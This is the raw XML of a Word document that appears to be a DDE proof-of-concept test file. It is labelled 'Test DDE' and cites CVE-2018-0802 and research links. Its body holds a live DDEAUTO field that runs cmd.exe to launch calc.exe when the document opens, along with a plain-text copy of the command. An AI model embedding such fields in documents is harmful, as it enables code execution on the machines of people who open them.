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F944" w14:textId="77777777" w:rsidR="0048746D" w:rsidRDefault="0048746D"/>
    <w:p w14:paraId="13F57101" w14:textId="64E9C725" w:rsidR="0048746D" w:rsidRDefault="00AB0D6C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="0048746D" w:rsidRPr="0048746D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>link</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7789CBA0" w14:textId="556D34C9" w:rsidR="00AB0D6C" w:rsidRPr="00AB0D6C" w:rsidRDefault="00AB0D6C" w:rsidP="00AB0D6C">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0D6C">
        <w:t>DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D4C138" w14:textId="3B502D70" w:rsidR="00346685" w:rsidRDefault="00346685" w:rsidP="00346685">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00346685">
        <w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>c</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00346685">
        <w:instrText xml:space="preserve"> calc.exe</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00AB0D6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6934E118" w14:textId="60118161" w:rsidR="0048746D" w:rsidRDefault="00E33D67" w:rsidP="00346685">
      <w:r>
        <w:t>Test DDE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C5BA4E" w14:textId="550B8931" w:rsidR="0048746D" w:rsidRDefault="00AB0D6C" w:rsidP="00E33D67">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="0048746D" w:rsidRPr="0048746D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>link</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="369AFAFD" w14:textId="6E1094BE" w:rsidR="0048746D" w:rsidRDefault="0048746D" w:rsidP="00E33D67">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t>(CVE-2018-0802)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008D7B40" w14:textId="674FB2B5" w:rsidR="00E33D67" w:rsidRDefault="00E33D67" w:rsidP="00E33D67">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E3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67"/>
    <w:rsid w:val="00346685"/>
    <w:rsid w:val="003761DB"/>
    <w:rsid w:val="003966A2"/>
    <w:rsid w:val="0048746D"/>
    <w:rsid w:val="00AB0D6C"/>
    <w:rsid w:val="00B27BC2"/>
    <w:rsid w:val="00E27905"/>
    <w:rsid w:val="00E3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ECCB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E601F1E8-B9CC-418F-A1A8-A3DB6853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3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D67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E33D67"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00487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4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4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earch.checkpoint.com/2018/another-office-equation-rce-vulnerability/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sensepost.com/blog/2017/macro-less-code-exec-in-m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synergetic wellness</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>synergetic wellness</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-20T03:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-20T07:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>